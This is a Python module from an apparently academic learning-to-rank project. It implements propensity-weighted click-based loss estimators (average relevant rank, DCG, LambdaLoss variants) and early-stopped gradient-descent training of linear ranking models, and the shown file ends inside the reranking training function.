| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2a7f1b2d37c863b54685948ccbc79d7c12bbc311
| 25,931
|
py
|
Python
|
utils/arp_ips.py
|
HarrieO/2020topkunbiasedltr
|
f6e191a6cb6d52a375a1ec213e42dbbda8fdb8ff
|
[
"MIT"
] | 4
|
2021-05-04T04:42:59.000Z
|
2021-10-06T09:41:28.000Z
|
utils/arp_ips.py
|
HarrieO/2020topkunbiasedltr
|
f6e191a6cb6d52a375a1ec213e42dbbda8fdb8ff
|
[
"MIT"
] | null | null | null |
utils/arp_ips.py
|
HarrieO/2020topkunbiasedltr
|
f6e191a6cb6d52a375a1ec213e42dbbda8fdb8ff
|
[
"MIT"
] | null | null | null |
# Copyright (C) H.R. Oosterhuis 2020.
# Distributed under the MIT License (see the accompanying README.md and LICENSE files).
import numpy as np
import time
import multi_click_models as clk
def calc_true_loss(ranking_model, data_split):
    """Average 1-based rank of relevant documents (label > 2) under the model.

    Scores every document with the linear model, ranks per query via
    clk.rank_and_invert, and averages the resulting ranks over all
    relevant documents in the split.
    """
    scores = np.dot(data_split.feature_matrix, ranking_model)
    rank_sum = 0.
    n_relevant = 0.
    for qid in np.arange(data_split.num_queries()):
        start, end = data_split.doclist_ranges[qid:qid+2]
        relevant = np.greater(data_split.query_labels(qid), 2)
        inverted = clk.rank_and_invert(scores[start:end])[1]
        # +1. converts the zero-based inverted ranking to 1-based ranks.
        rank_sum += np.sum(inverted[relevant]+1.)
        n_relevant += np.sum(relevant)
    return rank_sum/n_relevant
def estimate_loss(ranking_model,
                  data_split,
                  clicks):
    """Click-based (propensity-weighted) estimate of the average relevant rank.

    Mirrors calc_true_loss but replaces relevance labels with logged click
    statistics. Supports two logging regimes via clicks['rerank']: when False,
    per-document weights are used directly; when True, pairwise (n x n)
    weight matrices stored flat per query are used instead.
    """
    total_clicks = clicks['num_clicks']
    doc_clicks = clicks['clicks_per_doc'].astype(np.float64)
    # Self-normalized inverse-propensity weights (sum to 1 after division).
    inv_prop = clicks['average_weights']*(doc_clicks/float(total_clicks))
    inv_prop /= np.sum(inv_prop)
    all_docs = data_split.feature_matrix
    all_scores = np.dot(all_docs, ranking_model)
    rerank = clicks['rerank']
    if rerank:
        rerank_ranges = clicks['rerank_ranges']
        n_doc_per_q = (data_split.doclist_ranges[1:]
                       - data_split.doclist_ranges[:-1])
        def rerank_get(qid, values):
            # Slice out query qid's flattened pairwise block and reshape it
            # to its (n x n) matrix form.
            s_j, e_j = rerank_ranges[qid:qid+2]
            n = n_doc_per_q[qid]
            return np.reshape(values[s_j:e_j], (n, n))
    result = 0.
    denom = 0.
    for qid in clicks['queries']:
        s_i, e_i = data_split.doclist_ranges[qid:qid+2]
        q_scores = all_scores[s_i:e_i]
        if not rerank:
            # Weighted sum of 1-based ranks under the current model.
            q_inv_prop = inv_prop[s_i:e_i]
            inv_ranking = clk.rank_and_invert(q_scores)[1]+1.
            result += np.sum(q_inv_prop*inv_ranking)
        else:
            # Pairwise form: count score ties/inversions weighted by the
            # pairwise propensity matrix; denom self-normalizes over the
            # diagonal weights.
            less_mask = np.less_equal(q_scores[:, None],
                                      q_scores[None, :]).astype(np.float64)
            pair_inv_prop = rerank_get(qid, inv_prop)
            result += np.sum(less_mask*pair_inv_prop)
            # result += np.sum((less_mask*2.)*pair_inv_prop.T)
            denom += np.sum(np.diag(pair_inv_prop))
    if rerank:
        result /= denom
    return result
def calc_true_dcg_loss(ranking_model, data_split, cutoff=0):
    """Negative mean DCG gain over relevant documents (label > 2).

    A cutoff > 0 zeroes the gain of relevant documents ranked at or below
    that position; cutoff == 0 means no truncation.
    """
    scores = np.dot(data_split.feature_matrix, ranking_model)
    gain_total = 0.
    n_relevant = 0.
    for qid in np.arange(data_split.num_queries()):
        start, end = data_split.doclist_ranges[qid:qid+2]
        relevant = np.greater(data_split.query_labels(qid), 2)
        inverted = clk.rank_and_invert(scores[start:end])[1]
        # Standard DCG discount: 1 / log2(rank + 2) for zero-based ranks.
        gains = 1./np.log2(inverted[relevant]+2.)
        if cutoff > 0:
            gains[np.greater_equal(inverted[relevant], cutoff)] = 0.
        gain_total += np.sum(gains)
        n_relevant += np.sum(relevant)
    return -gain_total/n_relevant
def estimate_dcg_loss(ranking_model,
                      data_split,
                      clicks,
                      cutoff=0):
    """Click-based (propensity-weighted) estimate of the negative DCG loss.

    DCG analogue of estimate_loss: when clicks['rerank'] is False, weights
    per-document DCG gains by inverse-propensity weights; when True, uses
    pairwise weight matrices together with dcg_rerank_weights to bound the
    gain of each document between two neighbouring rank discounts.
    """
    total_clicks = clicks['num_clicks']
    doc_clicks = clicks['clicks_per_doc'].astype(np.float64)
    # Self-normalized inverse-propensity weights.
    inv_prop = clicks['average_weights']*(doc_clicks/float(total_clicks))
    inv_prop /= np.sum(inv_prop)
    all_docs = data_split.feature_matrix
    all_scores = np.dot(all_docs, ranking_model)
    rerank = clicks['rerank']
    if rerank:
        rerank_ranges = clicks['rerank_ranges']
        inv_ranking = clicks['inverted_ranking']
        n_doc_per_q = (data_split.doclist_ranges[1:]
                       - data_split.doclist_ranges[:-1])
        def rerank_get(qid, values):
            # Reshape query qid's flattened pairwise block to (n x n).
            s_j, e_j = rerank_ranges[qid:qid+2]
            n = n_doc_per_q[qid]
            return np.reshape(values[s_j:e_j], (n, n))
    result = 0.
    denom = 0.
    for qid in clicks['queries']:
        s_i, e_i = data_split.doclist_ranges[qid:qid+2]
        q_scores = all_scores[s_i:e_i]
        if not rerank:
            q_inv_prop = inv_prop[s_i:e_i]
            inv_ranking = clk.rank_and_invert(q_scores)[1]
            # DCG discount per document; truncated when cutoff > 0.
            dcg_gain = 1./np.log2(inv_ranking+2.)
            if cutoff > 0:
                dcg_gain[np.greater_equal(inv_ranking, cutoff)] = 0.
            result += np.sum(dcg_gain*q_inv_prop)
        else:
            q_prop = rerank_get(qid, inv_prop)
            q_log_rnk = inv_ranking[s_i:e_i]
            less_mask = np.less_equal(q_scores[:, None],
                                      q_scores[None, :]).astype(np.float64)
            # Decompose each document's weight over a lower and upper rank
            # bound, then apply the corresponding DCG discounts.
            low_rnk, low_w, up_w = dcg_rerank_weights(
                q_log_rnk,
                less_mask,
                q_prop,
                clicks['cutoff'])
            l_dcg_w = 1./np.log2(low_rnk+1.)
            u_dcg_w = 1./np.log2(low_rnk+2.)
            dcg_w = low_w * l_dcg_w + up_w * u_dcg_w
            result += np.sum(dcg_w)
            denom += np.sum(np.diag(q_prop))
    if rerank:
        result /= denom
    return -result
def dcg_estimate_rerank_weights(log_rnk, less_mask, prop, cutoff):
    """Split per-document propensity mass into a lower/upper rank-bound pair.

    Args:
        log_rnk: zero-based logged ranks per document, shape (n,).
        less_mask: (n, n) pairwise matrix; entry (i, j) nonzero when doc i
            scores at or below doc j under the current model.
        prop: (n, n) pairwise propensity weight matrix.
        cutoff: logging cutoff; documents with log_rnk < cutoff-1 are
            "always included" in the displayed ranking.

    Returns:
        (lower_rank, prop_not_added, prop_added): for each document, its
        lower rank bound, the weight attributed to that bound, and the
        weight attributed to the rank one above it.
    """
    # Documents surely shown vs. only sometimes shown under the cutoff.
    always_included = np.less(log_rnk, cutoff-1)
    sometimes_included = np.logical_not(always_included)
    # Lower rank bound: how many always-included docs score at least as high.
    lower_rank = np.sum(less_mask*always_included[None, :], axis=1)
    lower_rank[sometimes_included] += 1
    # Weight mass shifted upward by sometimes-included docs outranking us.
    added_to_rank = less_mask*sometimes_included[None, :]
    prop_added = np.sum(added_to_rank*prop, axis=1)
    prop_added[sometimes_included] = 0.
    prop_not_added = np.diag(prop) - prop_added
    return lower_rank, prop_not_added, prop_added
def dcg_rerank_weights(log_rnk, less_mask, prop, cutoff):
    """Pairwise lower/upper rank-bound weight matrices for reranked logs.

    Pairwise counterpart of dcg_estimate_rerank_weights: instead of vectors,
    returns full (n, n) weight matrices so each document pair contributes to
    either the lower rank discount (down_w) or the one-higher discount (up_w).

    Args:
        log_rnk: zero-based logged ranks per document, shape (n,).
        less_mask: (n, n) matrix, nonzero at (i, j) when doc i scores at or
            below doc j under the current model.
        prop: (n, n) pairwise propensity weight matrix.
        cutoff: logging cutoff separating always-included documents
            (log_rnk < cutoff-1) from sometimes-included ones.

    Returns:
        (lower_rank, down_w, up_w): lower rank bound per document plus the
        pairwise weights for the lower and upper discount, respectively.
    """
    n_doc = log_rnk.size
    # Documents surely displayed vs. only sometimes displayed.
    always_included = np.less(log_rnk, cutoff-1)
    sometimes_included = np.logical_not(always_included)
    # Lower rank bound from always-included docs that outrank each doc.
    lower_rank = np.sum(less_mask*always_included[None, :], axis=1)
    lower_rank[sometimes_included] += 1
    # Weight mass pushed up by sometimes-included docs outranking an
    # always-included doc.
    added_to_rank = less_mask[always_included, :]*sometimes_included[None, :]
    prop_added = np.sum(added_to_rank*prop[always_included, :], axis=1) #- np.diag(prop*sometimes_included[None, :])
    prop_not_added = np.diag(prop)[always_included] - prop_added
    up_w = np.zeros((n_doc, n_doc))
    down_w = np.zeros((n_doc, n_doc))
    # Distribute the not-added / added mass across always-included columns;
    # sometimes-included rows keep their raw pairwise weights.
    down_w[always_included, :] = prop_not_added[:, None] * always_included[None, :]
    down_w[sometimes_included, :] = prop[sometimes_included, :]
    up_w[always_included, :] = prop_added[:, None] * always_included[None, :]
    up_w[always_included, :] += prop[always_included, :] * added_to_rank
    return lower_rank, down_w, up_w
def optimize(loss_name,
             data,
             train_clicks,
             validation_clicks,
             learning_rate,
             trial_epochs,
             max_epochs=50,
             epsilon_thres=0.0001,
             learning_rate_decay=0.97,
             cutoff=5):
    """Train a linear ranking model on clicks for the ARP-style losses.

    Runs pairwise gradient descent with early stopping: training stops when
    the estimated validation loss has not improved by epsilon_thres within
    trial_epochs epochs (or at max_epochs).

    Args:
        loss_name: 'monotonic' selects the DCG-bound loss; any other value
            selects the plain relevant-rank loss. 'lambdaloss-truncated'
            raises NotImplementedError.
        data: dataset object with train/validation splits.
        train_clicks / validation_clicks: logged click dictionaries.
        learning_rate, learning_rate_decay: step size and per-epoch decay.
        trial_epochs: patience window for early stopping.
        max_epochs: hard epoch limit.
        epsilon_thres: minimum improvement to reset the patience window.
        cutoff: DCG cutoff used in the rerank branch.

    Returns:
        A result dict with the best model, its losses, and timing info.
    """
    if loss_name == 'monotonic':
        est_loss_fn = estimate_dcg_loss
        true_loss_fn = calc_true_dcg_loss
    else:
        est_loss_fn = estimate_loss
        true_loss_fn = calc_true_loss
    total_clicks = train_clicks['num_clicks']
    ave_weights = train_clicks['average_weights']
    doc_clicks = train_clicks['clicks_per_doc'].astype(np.float64)
    train_queries = train_clicks['queries']
    rerank = train_clicks['rerank']
    # Inverse-propensity weights; normalization differs per logging regime.
    inv_prop = ave_weights*(doc_clicks/float(total_clicks))
    if not rerank:
        inv_prop /= np.sum(inv_prop)
    else:
        rerank_ranges = train_clicks['rerank_ranges']
        inv_ranking = train_clicks['inverted_ranking']
        n_doc_per_q = (data.train.doclist_ranges[1:]
                       - data.train.doclist_ranges[:-1])
        def rerank_get(qid, values):
            # Reshape query qid's flattened pairwise block to (n x n).
            s_j, e_j = rerank_ranges[qid:qid+2]
            n = n_doc_per_q[qid]
            return np.reshape(values[s_j:e_j], (n, n))
        # Self-normalize over the diagonal of every pairwise weight matrix.
        self_norm = 0.
        for qid in train_queries:
            q_prop = rerank_get(qid, inv_prop)
            self_norm += np.sum(np.diag(q_prop))
        inv_prop /= self_norm
    best_model = np.zeros(data.train.datafold.num_features)
    best_loss = np.inf
    best_epoch = 0
    pivot_loss = np.inf
    model = np.zeros(data.train.datafold.num_features)
    start_time = time.time()
    absolute_error = 1.-np.sum(inv_prop)
    print('Normalization error: %s' % absolute_error)
    epoch_i = 0
    cur_loss = est_loss_fn(model,
                           data.validation,
                           validation_clicks)
    true_loss = true_loss_fn(model,
                             data.validation)
    print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
    stop_epoch = trial_epochs
    while epoch_i < min(stop_epoch, max_epochs):
        permutation = np.random.permutation(train_queries)
        for qid in permutation:
            q_docs = data.train.query_feat(qid)
            q_scores = np.dot(q_docs, model)
            # Hinge-style pairwise mask: 1 where s_i <= s_j + 1.
            less_mask = np.less_equal(q_scores[:, None], q_scores[None, :]+1.).astype(float)
            s_i, e_i = data.train.doclist_ranges[qid:qid+2]
            if not rerank:
                q_prop = inv_prop[s_i:e_i]
                activation_gradient = -less_mask*q_prop[:, None]
            else:
                q_prop = rerank_get(qid, inv_prop)
                activation_gradient = -less_mask*q_prop
            if loss_name == 'monotonic':
                if not rerank:
                    # Upper bound on each document's rank, used to weight
                    # the gradient by the DCG discount derivative.
                    up_rank = np.sum(np.maximum(1 - (q_scores[:, None] - q_scores[None, :]), 0), axis=1)
                    dcg_weights = 1./(np.log2(up_rank+1.)**2*np.log(2)*(up_rank+1))
                    activation_gradient *= dcg_weights[:, None]
                else:
                    q_log_rnk = inv_ranking[s_i:e_i]
                    low_rnk, low_w, up_w = dcg_rerank_weights(q_log_rnk,
                                                              less_mask,
                                                              q_prop,
                                                              cutoff)
                    l_dcg_w = 1./(np.log2(low_rnk+1.)**2*np.log(2)*(low_rnk+1))
                    u_dcg_w = 1./(np.log2(low_rnk+2.)**2*np.log(2)*(low_rnk+2))
                    dcg_w = low_w * l_dcg_w[:, None] + up_w * u_dcg_w[:, None]
                    activation_gradient = -less_mask*dcg_w
            elif loss_name == 'lambdaloss-truncated':
                raise NotImplementedError('Truncated loss needs implementation for optimize.')
            # Fold each row's off-diagonal mass back onto the diagonal.
            np.fill_diagonal(activation_gradient,
                             np.diag(activation_gradient)
                             - np.sum(activation_gradient, axis=1))
            doc_weights = np.sum(activation_gradient, axis=0)
            gradient = np.sum(q_docs * doc_weights[:, None], axis=0)
            model += (learning_rate*gradient
                      *(learning_rate_decay**epoch_i))
        epoch_i += 1
        cur_loss = est_loss_fn(model,
                               data.validation,
                               validation_clicks)
        true_loss = true_loss_fn(model,
                                 data.validation)
        print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
        if cur_loss < best_loss:
            best_model = model
            best_loss = cur_loss
            best_epoch = epoch_i
        if pivot_loss - cur_loss > epsilon_thres:
            pivot_loss = cur_loss
            stop_epoch = epoch_i + trial_epochs
    # Report the true loss of the *best* model, matching best_model and
    # best_loss below (previously this evaluated the final model instead,
    # inconsistent with optimize_dcg / optimize_rerank_dcg).
    true_loss = true_loss_fn(best_model,
                             data.validation)
    result = {
        'model': best_model,
        'estimated_loss': best_loss,
        'true_loss': true_loss,
        'epoch': best_epoch,
        'total_time_spend': time.time()-start_time,
        'time_per_epoch': (time.time()-start_time)/float(epoch_i),
        'learning_rate': learning_rate,
        'trial_epochs': trial_epochs,
        'learning_rate_decay': learning_rate_decay,
    }
    return result
def linear_diff_grad(scores):
    """Indicator matrix of the linear rank bound.

    Entry (i, j) is 1.0 exactly when scores[i] <= scores[j] + 1,
    i.e. the hinge in the monotonic rank upper bound is active.
    """
    shifted = scores[None, :] + 1.
    mask = np.less_equal(scores[:, None], shifted)
    return mask.astype(float)
def sigmoid_diff_grad(scores):
    """Gradient factor of the log2-sigmoid rank bound per score pair.

    Computes exp(-d) / ((1 + exp(-d)) * ln 2) for every pairwise score
    difference d = scores[i] - scores[j].
    """
    pairwise_diff = scores[:, None] - scores[None, :]
    # Clamp large negative differences so np.exp cannot overflow.
    pairwise_diff = np.maximum(pairwise_diff, -700.)
    neg_exp = np.exp(-pairwise_diff)
    return 1./((1+neg_exp)*np.log(2.))*neg_exp
def optimize_dcg(
        loss_name,
        data,
        train_clicks,
        validation_clicks,
        learning_rate,
        trial_epochs,
        max_epochs=50,
        epsilon_thres=0.0001,
        learning_rate_decay=0.97,
        cutoff=5):
    """Train a linear ranking model on clicks for the DCG-based losses.

    Pairwise gradient descent with early stopping (patience trial_epochs,
    improvement threshold epsilon_thres, hard cap max_epochs). Supported
    loss_name values: 'monotonic', 'log_monotonic', 'relevant_rank',
    'log_relevant_rank', 'lambdaloss@k', 'lambdaloss-full',
    'lambdaloss-truncated'. Returns a result dict with the best model,
    its estimated/true losses, and timing information.
    """
    est_loss_fn = estimate_dcg_loss
    true_loss_fn = calc_true_dcg_loss
    total_clicks = train_clicks['num_clicks']
    ave_weights = train_clicks['average_weights']
    doc_clicks = train_clicks['clicks_per_doc'].astype(np.float64)
    train_queries = train_clicks['queries']
    # Self-normalized inverse-propensity weights per document.
    inv_prop = ave_weights*(doc_clicks/float(total_clicks))
    inv_prop /= np.sum(inv_prop)
    best_model = np.zeros(data.train.datafold.num_features)
    best_loss = np.inf
    best_epoch = 0
    pivot_loss = np.inf
    model = np.zeros(data.train.datafold.num_features)
    start_time = time.time()
    absolute_error = 1.-np.sum(inv_prop)
    print('Normalization error: %s' % absolute_error)
    num_docs = data.train.num_docs()
    doc_feat = data.train.feature_matrix
    epoch_i = 0
    # Initial validation losses of the zero model.
    cur_loss = est_loss_fn(model,
                           data.validation,
                           validation_clicks,
                           cutoff)
    true_loss = true_loss_fn(model,
                             data.validation,
                             cutoff)
    print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
    stop_epoch = trial_epochs
    while epoch_i < min(stop_epoch, max_epochs):
        permutation = np.random.permutation(train_queries)
        for qid in permutation:
            q_docs = data.train.query_feat(qid)
            q_scores = np.dot(q_docs, model)
            n_docs = q_docs.shape[0]
            s_i, e_i = data.train.doclist_ranges[qid:qid+2]
            q_prop = inv_prop[s_i:e_i]
            if loss_name in ['monotonic',
                             'log_monotonic',
                             'relevant_rank',
                             'log_relevant_rank']:
                # Rank-bound family: hinge or sigmoid pairwise gradient.
                if loss_name in ['monotonic', 'relevant_rank']:
                    diff_grad = linear_diff_grad(q_scores)
                elif loss_name in ['log_monotonic', 'log_relevant_rank']:
                    diff_grad = sigmoid_diff_grad(q_scores)
                activation_gradient = -diff_grad*q_prop[:, None]
                if 'monotonic' in loss_name:
                    # Extra DCG-discount derivative weighting based on each
                    # document's rank upper bound.
                    if loss_name == 'monotonic':
                        up_rank = np.sum(np.maximum(1 - (q_scores[:, None] - q_scores[None, :]), 0), axis=1)
                    elif loss_name == 'log_monotonic':
                        score_diff = q_scores[:, None] - q_scores[None, :]
                        up_rank = np.sum(
                            np.log2(1 + np.exp(-score_diff)),
                            axis=1)
                    dcg_weights = 1./(np.log2(up_rank+1.)**2*np.log(2)*(up_rank+1))
                    activation_gradient *= dcg_weights[:, None]
            elif loss_name in ['lambdaloss@k', 'lambdaloss-full', 'lambdaloss-truncated']:
                # LambdaLoss family: pairwise weights from rank-difference
                # discounts times propensity differences.
                q_inv = clk.rank_and_invert(q_scores)[1]
                prop_diff = q_prop[:, None] - q_prop[None, :]
                prop_mask = np.less_equal(prop_diff, 0.)
                if loss_name == 'lambdaloss-truncated':
                    # Only pairs with at least one doc inside the cutoff.
                    rnk_vec = np.less(q_inv, cutoff)
                    rnk_mask = np.logical_or(rnk_vec[:, None],
                                             rnk_vec[None, :])
                    prop_mask = np.logical_or(np.logical_not(rnk_mask), prop_mask)
                rank_diff = np.abs(q_inv[:, None] - q_inv[None, :])
                rank_diff[prop_mask] = 1.
                disc_upp = 1. / np.log2(rank_diff+1.)
                disc_low = 1. / np.log2(rank_diff+2.)
                if loss_name == 'lambdaloss@k':
                    disc_upp[np.greater(rank_diff, cutoff)] = 0.
                    disc_low[np.greater(rank_diff, cutoff-1)] = 0.
                pair_w = disc_upp - disc_low
                pair_w *= np.abs(prop_diff)
                pair_w[prop_mask] = 0.
                score_diff = q_scores[:, None] - q_scores[None, :]
                score_diff[prop_mask] = 0.
                # Clamp the exponent so np.exp cannot overflow.
                safe_diff = np.minimum(-score_diff, 500)
                act = 1./(1 + np.exp(safe_diff))
                act[prop_mask] = 0.
                safe_exp = pair_w - 1.
                safe_exp[prop_mask] = 0.
                # Chain rule through log2(sigmoid^pair_w).
                log2_grad = 1./(act**pair_w*np.log(2))
                power_grad = pair_w*(act)**safe_exp
                sig_grad = act*(1-act)
                activation_gradient = -log2_grad*power_grad*sig_grad
            # Fold each row's off-diagonal mass back onto the diagonal.
            np.fill_diagonal(activation_gradient,
                             np.diag(activation_gradient)
                             - np.sum(activation_gradient, axis=1))
            doc_weights = np.sum(activation_gradient, axis=0)
            # print('########')
            # print(q_prop)
            # print(doc_weights)
            gradient = np.sum(q_docs * doc_weights[:, None], axis=0)
            model += (learning_rate*gradient
                      *(learning_rate_decay**epoch_i))
        epoch_i += 1
        cur_loss = est_loss_fn(model,
                               data.validation,
                               validation_clicks,
                               cutoff)
        true_loss = true_loss_fn(model,
                                 data.validation,
                                 cutoff)
        print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
        if cur_loss < best_loss:
            best_model = model
            best_loss = cur_loss
            best_epoch = epoch_i
        if pivot_loss - cur_loss > epsilon_thres:
            pivot_loss = cur_loss
            stop_epoch = epoch_i + trial_epochs
    true_loss = true_loss_fn(best_model,
                             data.validation,
                             cutoff)
    result = {
        'model': best_model,
        'estimated_loss': best_loss,
        'true_loss': true_loss,
        'epoch': best_epoch,
        'total_time_spend': time.time()-start_time,
        'time_per_epoch': (time.time()-start_time)/float(epoch_i),
        'learning_rate': learning_rate,
        'trial_epochs': trial_epochs,
        'learning_rate_decay': learning_rate_decay,
    }
    # print(learning_rate, clip_thres, best_epoch, best_loss, true_loss)
    return result
def lambdaloss_rerank_weights(log_rnk, less_mask, opt_cutoff, log_cutoff):
    """Pairwise rank-distance and weight matrices for reranked LambdaLoss.

    Args:
        log_rnk: zero-based logged ranks per document, shape (n,).
        less_mask: (n, n) matrix, nonzero at (i, j) when doc i scores at or
            below doc j under the current model.
        opt_cutoff: optimization (metric) cutoff.
        log_cutoff: logging cutoff; docs with log_rnk < log_cutoff-1 were
            always displayed, the rest only sometimes.

    Returns:
        (lower_distance, lower_weight, higher_distance, higher_weight):
        pairwise rank-distance matrices for the lower/upper bound and the
        weight with which each pair contributes to either bound.
    """
    n_doc = log_rnk.size
    always_included = np.less(log_rnk, log_cutoff-1)
    sometimes_included = np.logical_not(always_included)
    # Lower rank bound from always-included docs that outrank each doc.
    lower_rank = np.sum(less_mask*always_included[None, :], axis=1)
    lower_rank[sometimes_included] += 1
    always_ind = np.where(always_included)[0]
    sometimes_ind = np.where(sometimes_included)[0]
    # Rank of an always-included doc when one sometimes-included doc is
    # displayed above it.
    higher_rank = lower_rank[always_ind, None] + less_mask[always_ind[:, None], sometimes_ind[None, :]]
    lower_distance = np.zeros((n_doc, n_doc))
    lower_distance[always_ind[:, None], sometimes_ind[None, :]] = higher_rank - lower_rank[None, sometimes_ind]
    # lower_distance[sometimes_ind[:, None], always_ind[None, :]] = higher_rank.T - lower_rank[sometimes_ind, None]
    lower_distance += lower_distance.T
    # Pairs eligible for the metric: at least one side within opt_cutoff.
    high_mask = np.less(higher_rank, opt_cutoff)
    low_mask = np.less(lower_rank, opt_cutoff)
    sometimes_mask = np.logical_or(high_mask, low_mask[None, sometimes_ind])
    lower_weight = np.zeros((n_doc, n_doc))
    lower_weight[always_ind[:, None], sometimes_ind[None, :]] = np.logical_or(high_mask, low_mask[None, sometimes_ind])
    lower_weight += lower_weight.T
    lower_distance[always_ind[:, None], always_ind[None, :]] = lower_rank[always_ind, None] - lower_rank[None, always_ind]
    # lower_distance[always_ind[None, :], always_ind[:, None]] = lower_rank[None, always_ind] - lower_rank[always_ind, None]
    lower_distance = np.abs(lower_distance)
    higher_distance = np.zeros((n_doc, n_doc))
    higher_weight = np.zeros((n_doc, n_doc))
    n_sometimes = np.sum(sometimes_included)
    if n_sometimes == 0:
        # No uncertainty: every pair weight is decided by opt_cutoff alone.
        lower_weight = np.logical_or(low_mask[:, None], low_mask[None, :]).astype(np.float64)
    else:
        higher_distance[always_ind[:, None], always_ind[None, :]] = lower_distance[always_ind[:, None], always_ind[None, :]] + 1
        # higher_distance[always_ind[None, :], always_ind[:, None]] = lower_distance[always_ind[None, :], always_ind[:, None]] + 1
        # Average over the sometimes-included docs whether a pair's rank
        # distance is shifted (xor of which side the doc lands above).
        cutoff_check = np.logical_or(high_mask[:, None, :], high_mask[None, :, :])
        less_always = less_mask[always_ind[:, None], sometimes_ind[None, :]]
        xor_less_always = np.logical_xor(
            less_always[:,None,:], less_always[None, :, :]
        )
        high_count = np.logical_and(cutoff_check, xor_less_always)
        low_count = np.logical_and(cutoff_check, np.logical_not(xor_less_always))
        lower_weight[always_ind[:, None], always_ind[None, :]] = np.sum(low_count, axis=2)/float(n_sometimes)
        higher_weight[always_ind[:, None], always_ind[None, :]] = np.sum(high_count, axis=2)/float(n_sometimes)
    return lower_distance, lower_weight, higher_distance, higher_weight
def optimize_rerank_dcg(
        loss_name,
        data,
        train_clicks,
        validation_clicks,
        learning_rate,
        trial_epochs,
        max_epochs=50,
        epsilon_thres=0.0001,
        learning_rate_decay=0.97,
        cutoff=5,
        log_cutoff=5):
    """Train a linear model with truncated LambdaLoss on reranked click logs.

    Only loss_name == 'lambdaloss-truncated' is supported. Uses pairwise
    propensity matrices (stored flat per query in the click log) and
    lambdaloss_rerank_weights to account for uncertainty in the displayed
    ranking. Early stopping mirrors optimize_dcg; additionally training
    stops after one epoch when log_cutoff == 1. Returns a result dict with
    the best model, its losses, and timing info.
    """
    assert loss_name == 'lambdaloss-truncated'
    est_loss_fn = estimate_dcg_loss
    true_loss_fn = calc_true_dcg_loss
    total_clicks = train_clicks['num_clicks']
    ave_weights = train_clicks['average_weights']
    doc_clicks = train_clicks['clicks_per_doc'].astype(np.float64)
    train_queries = train_clicks['queries']
    inv_prop = ave_weights*(doc_clicks/float(total_clicks))
    rerank_ranges = train_clicks['rerank_ranges']
    inv_ranking = train_clicks['inverted_ranking']
    n_doc_per_q = (data.train.doclist_ranges[1:]
                   - data.train.doclist_ranges[:-1])
    def rerank_get(qid, values):
        # Reshape query qid's flattened pairwise block to (n x n).
        s_j, e_j = rerank_ranges[qid:qid+2]
        n = n_doc_per_q[qid]
        return np.reshape(values[s_j:e_j], (n, n))
    # Self-normalize over the diagonals of all pairwise weight matrices.
    self_norm = 0.
    for qid in train_queries:
        q_prop = rerank_get(qid, inv_prop)
        self_norm += np.sum(np.diag(q_prop))
    inv_prop /= self_norm
    best_model = np.zeros(data.train.datafold.num_features)
    best_loss = np.inf
    best_epoch = 0
    pivot_loss = np.inf
    model = np.zeros(data.train.datafold.num_features)
    start_time = time.time()
    absolute_error = 1.-np.sum(inv_prop)
    print('Normalization error: %s' % absolute_error)
    num_docs = data.train.num_docs()
    doc_feat = data.train.feature_matrix
    epoch_i = 0
    cur_loss = est_loss_fn(model,
                           data.validation,
                           validation_clicks,
                           cutoff)
    true_loss = true_loss_fn(model,
                             data.validation,
                             cutoff)
    print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
    stop_epoch = trial_epochs
    while epoch_i < min(stop_epoch, max_epochs):
        permutation = np.random.permutation(train_queries)
        for qid in permutation:
            q_prop = rerank_get(qid, inv_prop)
            # Skip queries that received no propensity mass at all.
            if np.sum(q_prop) == 0:
                continue
            q_prop = np.diag(q_prop)
            q_docs = data.train.query_feat(qid)
            q_scores = np.dot(q_docs, model)
            n_docs = q_docs.shape[0]
            less_mask = np.less_equal(
                q_scores[:, None],
                q_scores[None, :]
            ).astype(float)
            s_i, e_i = data.train.doclist_ranges[qid:qid+2]
            q_log_rnk = inv_ranking[s_i:e_i]
            # Lower/upper rank-distance matrices and their weights.
            low_diff, low_w, up_diff, up_w = lambdaloss_rerank_weights(
                q_log_rnk,
                less_mask,
                cutoff,
                log_cutoff)
            def grad_calc(rank_diff, diff_weights):
                # LambdaLoss pairwise gradient for one bound (mutates
                # rank_diff in place on masked entries).
                prop_diff = q_prop[:, None] - q_prop[None, :]
                prop_mask = np.less_equal(prop_diff, 0.)
                prop_mask = np.logical_or(prop_mask,
                                          np.less_equal(diff_weights, 0.))
                rank_diff[prop_mask] = 1.
                # tiebreaker
                rank_diff[np.less(rank_diff, 1)] = 1
                disc_upp = 1. / np.log2(rank_diff+1.)
                disc_low = 1. / np.log2(rank_diff+2.)
                if loss_name == 'lambdaloss@k':
                    disc_upp[np.greater(rank_diff, cutoff)] = 0.
                    disc_low[np.greater(rank_diff, cutoff-1)] = 0.
                pair_w = disc_upp - disc_low
                pair_w *= np.abs(prop_diff)
                pair_w[prop_mask] = 0.
                score_diff = q_scores[:, None] - q_scores[None, :]
                score_diff[prop_mask] = 0.
                # Clamp the exponent so np.exp cannot overflow.
                safe_diff = np.minimum(-score_diff, 500)
                act = 1./(1 + np.exp(safe_diff))
                act[prop_mask] = 0.
                safe_exp = pair_w - 1.
                safe_exp[prop_mask] = 0.
                log2_grad = 1./(act**pair_w*np.log(2))
                power_grad = pair_w*(act)**safe_exp
                sig_grad = act*(1-act)
                return -log2_grad*power_grad*sig_grad
            low_grad = grad_calc(low_diff, low_w)
            up_grad = grad_calc(up_diff, up_w)
            # Combine both bounds weighted by their probabilities.
            activation_gradient = low_w*low_grad + up_w*up_grad
            np.fill_diagonal(activation_gradient,
                             np.diag(activation_gradient)
                             - np.sum(activation_gradient, axis=1))
            doc_weights = np.sum(activation_gradient, axis=0)
            # print('########')
            # print(q_prop)
            # print(doc_weights)
            gradient = np.sum(q_docs * doc_weights[:, None], axis=0)
            model += (learning_rate*gradient
                      *(learning_rate_decay**epoch_i))
        epoch_i += 1
        cur_loss = est_loss_fn(model,
                               data.validation,
                               validation_clicks,
                               cutoff)
        true_loss = true_loss_fn(model,
                                 data.validation,
                                 cutoff)
        print(epoch_i, '%0.05f' % cur_loss, '%0.05f' % true_loss)
        if cur_loss < best_loss:
            best_model = model
            best_loss = cur_loss
            best_epoch = epoch_i
